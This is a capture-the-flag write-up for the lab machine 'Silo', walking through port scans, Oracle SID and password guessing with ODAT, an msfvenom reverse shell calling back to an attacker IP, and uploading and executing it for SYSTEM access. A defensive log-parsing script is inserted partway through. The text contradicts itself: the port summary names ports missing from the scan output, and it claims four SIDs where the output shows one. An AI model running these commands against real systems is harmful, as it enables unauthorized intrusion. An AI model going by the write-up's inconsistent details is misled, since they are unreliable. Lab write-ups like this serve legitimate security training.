Silo
Reconnaissance:
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.82
80/tcp open http Microsoft IIS httpd 8.5
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-time:
| date: 2023-12-17T02:29:46
|_ start_date: 2023-12-17T02:23:51
|_clock-skew: mean: -2s, deviation: 0s, median: -3s
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.82
PORT STATE SERVICE
123/udp open|filtered ntp
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
500/udp open|filtered isakmp
4500/udp open|filtered nat-t-ike
5355/udp open|filtered llmnr
20003/udp open|filtered commtact-https
40805/udp open|filtered unknown
We have fifteen open ports.
Port 80: running Microsoft-IIS/8.5
Ports 135, 49152, 49153, 49154, 49155, 49158, 49161 & 49162: running Microsoft Windows RPC
Ports 139 & 445: running Samba
Ports 1521 & 4196: running Oracle TNS listener
Ports 5985 & 47001: running Microsoft HTTP API httpd 2.0
Port 80 is running Microsoft IIS 8.5. A quick Google search tells us that this version ships with Windows Server 2012 R2, so that is probably the OS. The gobuster scan didn't find anything useful on this web server.
┌──(kali💀kali)-[~]
└─$ nikto -host 10.10.10.82
+ Server: Microsoft-IIS/8.5
+ /: Retrieved x-powered-by header: ASP.NET.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /FvdPFBj4.ashx: Retrieved x-aspnet-version header: 4.0.30319.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OPTIONS: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
+ OPTIONS: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST .
┌──(kali💀kali)-[~]
└─$ gobuster dir -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.82/
/*checkout* (Status: 400) [Size: 3420]
/*docroot* (Status: 400) [Size: 3420]
/* (Status: 400) [Size: 3420]
/http%3A%2F%2Fwww (Status: 400) [Size: 3420]
/http%3A (Status: 400) [Size: 3420]
/q%26a (Status: 400) [Size: 3420]
/**http%3a (Status: 400) [Size: 3420]
/*http%3A (Status: 400) [Size: 3420]
Enumeration:
┌──(kali💀kali)-[~]
└─$ searchsploit Oracle TNS listener
Oracle 10gR2 - TNS Listener AUTH_SESSKEY Buffer Overflow (Met | windows/remote/16342.rb
Oracle 8.1.x/9.0/9.2 - TNS Listener Service_CurLoad Remote De | multiple/dos/21782.txt
Oracle 8i - TNS Listener 'ARGUMENTS' Remote Buffer Overflow ( | windows/remote/16340.rb
Oracle 8i - TNS Listener Buffer Overflow | windows/remote/20980.c
Oracle 8i - TNS Listener Local Command Parameter Buffer Overf | linux/local/21362.c
Oracle 8i - TNS Listener SERVICE_NAME Buffer Overflow (Metasp | windows/remote/16341.rb
Oracle RDBms 10.2.0.3/11.1.0.6 - TNS Listener (PoC) | windows/dos/8507.py
If you don't have ODAT installed on Kali, the installation instructions can be found:
The first thing we need to enumerate is the Oracle System ID (SID) string. This is a string that is used to uniquely identify a particular database on a system. This can be done using the sidguesser module in ODAT.
┌──(kali💀kali)-[~]
└─$ sudo odat sidguesser -s 10.10.10.82 -p1521
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue... ######################### | ETA: 00:00:03
100% |#########################################################################| Time: 00:06:24
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |#########################################################################| Time: 00:00:12
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue... ################## | ETA: 00:00:37
100% |#########################################################################| Time: 00:05:46
[+] SIDs found on the 10.10.10.82:1521 server: XE
This takes a while, but it does find 4 valid SID strings.
[+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB,SA,SB
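From the defender's side, every SID that sidguesser tries is a connect request the listener rejects with TNS-12505 (unknown SID) or TNS-12514 (unknown service name), and each rejection is written to listener.log. As an added example (not from the original writeup or from ODAT), this parses the 11g plain-text listener.log layout and reports source hosts that triggered rejections for several different SIDs. The log lines are constructed; the field layout (timestamp * CONNECT_DATA * ADDRESS * event * sid * return code) is assumed to match your listener version.

```python
import re

# Constructed listener.log excerpt: three guessed SIDs rejected (12505), then the
# real SID 'XE' accepted (return code 0), then a legitimate client connection.
LISTENER_LOG = """\
17-DEC-2023 02:25:01 * (CONNECT_DATA=(SID=A)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.3)(PORT=41022)) * establish * A * 12505
17-DEC-2023 02:25:01 * (CONNECT_DATA=(SID=B)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.3)(PORT=41023)) * establish * B * 12505
17-DEC-2023 02:25:02 * (CONNECT_DATA=(SID=C)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.3)(PORT=41024)) * establish * C * 12505
17-DEC-2023 02:25:02 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.3)(PORT=41025)) * establish * XE * 0
17-DEC-2023 02:26:10 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=svc))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.10.50)(PORT=50211)) * establish * XE * 0
"""

REJECT_CODES = {12505, 12514}  # unknown SID / unknown service name


def parse_listener_log(text):
    """Return (timestamp, source_host, requested_sid, return_code) per 'establish' record."""
    records = []
    for line in text.splitlines():
        fields = line.split(" * ")
        if len(fields) != 6 or fields[3] != "establish":
            continue  # skip continuation lines such as 'TNS-12505: ...'
        host = re.search(r"\(HOST=([^)]+)\)", fields[2])
        sid = re.search(r"\((?:SID|SERVICE_NAME)=([^)]*)\)", fields[1])
        records.append((fields[0],
                        host.group(1) if host else "?",
                        sid.group(1) if sid else "?",
                        int(fields[5])))
    return records


def sid_guess_sources(text, threshold=3):
    """Hosts whose rejected connects named at least `threshold` distinct SIDs."""
    rejected = {}
    for _ts, host, sid, rc in parse_listener_log(text):
        if rc in REJECT_CODES:
            rejected.setdefault(host, set()).add(sid)
    return {h: sorted(s) for h, s in rejected.items() if len(s) >= threshold}
```

The passwordguesser phase completes the TNS connect, so it leaves return code 0 here; its failures show up as ORA-01017 entries in the database audit trail instead, when session auditing is enabled.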
We discovered a SID called 'XE'. Now let's try finding valid credentials on this server:
┌──(kali💀kali)-[~]
└─$ sudo odat passwordguesser -s 10.10.10.82 -p1521 -d XE
[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
The login cis has already been tested at least once. What do you want to do: | ETA: 00:19:52
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'ctxsys' account is locked, so skipping this username for password | ETA: 00:22:51
[!] Notice: 'dbsnmp' account is locked, so skipping this username for password | ETA: 00:21:55
[!] Notice: 'dip' account is locked, so skipping this username for password | ETA: 00:20:38
[!] Notice: 'hr' account is locked, so skipping this username for password | ETA: 00:16:36
[!] Notice: 'mdsys' account is locked, so skipping this username for password | ETA: 00:12:38
[!] Notice: 'oracle_ocm' account is locked, so skipping this username for passwordTA: 00:09:48
[!] Notice: 'outln' account is locked, so skipping this username for password | ETA: 00:08:48
[+] Valid credentials found: scott/tiger. Continue... ########## | ETA: 00:04:50
[!] Notice: 'xdb' account is locked, so skipping this username for password# | ETA: 00:00:57
100% |#########################################################################| Time: 00:24:01
[+] Accounts found on 10.10.10.82:1521/sid:XE:
scott/tiger
Now we have valid credentials: user 'scott' and password 'tiger' for the SID 'XE'. We can use them to upload a reverse shell and execute it.
To do that, we first need to prepare our EXE reverse shell using MSFvenom:
┌──(kali💀kali)-[~/Desktop]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f exe > shell.exe
Now upload the reverse shell:
┌──(kali💀kali)-[~]
└─$ sudo odat utlfile -s 10.10.10.82 --sysdba -d XE -U scott -P tiger --putFile /temp tonee.exe /home/kali/Desktop/shell.exe
Start the NC listener on the port that we used with MSFvenom:
┌──(kali💀kali)-[~]
└─$ nc -nvlp 4444
Finally, execute the shell:
┌──(kali💀kali)-[~]
└─$ sudo odat externaltable -s 10.10.10.82 --sysdba -d XE -U scott -P tiger --exec /temp tonee.exe
Go back to your NC listener:
We are NT Authority\System.